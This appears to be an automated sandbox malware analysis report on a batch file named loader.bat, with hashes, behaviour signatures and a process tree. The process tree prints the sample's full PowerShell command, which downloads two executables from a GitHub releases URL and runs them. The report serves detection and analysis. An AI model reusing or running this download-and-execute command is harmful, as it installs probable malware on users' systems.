Overview

overview

10

Static

static

1

loader.bat

windows7-x64

8

loader.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    27/11/2024, 17:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    loader.bat

  • Size

    540B

  • MD5

    a589333e5f49d10e2f2cad3f7315db41

  • SHA1

    37c5bea8569e3bfd0caece0b8d88d817eab73e16

  • SHA256

    65b18e0843829b1d85ce47307aba784ee659a2e2a164c584155211d764bb4ec3

  • SHA512

    6b73eccb11430d34b4e74074a050985ee3211751b8e7bd50d94afc55b4b7e54f33f85f98e5f460278675368984169c02d7feb9eccc9284844901147ddb75544a

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

    execution
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -Command "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/bothg/releases/download/das/Loader.exe' -OutFile 'Loader.exe';" "Start-Process -FilePath 'Loader.exe' -NoNewWindow;" "Wait-Process -Name 'Loader';" "Invoke-WebRequest -Uri 'https://github.com/Realmastercoder69/bothg/releases/download/das/Start.exe' -OutFile 'Start.exe';" "Start-Process -FilePath 'Start.exe' -NoNewWindow;"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2404

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2404-4-0x000007FEF60DE000-0x000007FEF60DF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2404-5-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2404-6-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2404-7-0x000000001B400000-0x000000001B6E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2404-9-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2404-8-0x0000000002500000-0x0000000002508000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2404-10-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2404-11-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp

    Filesize

    9.6MB

    Download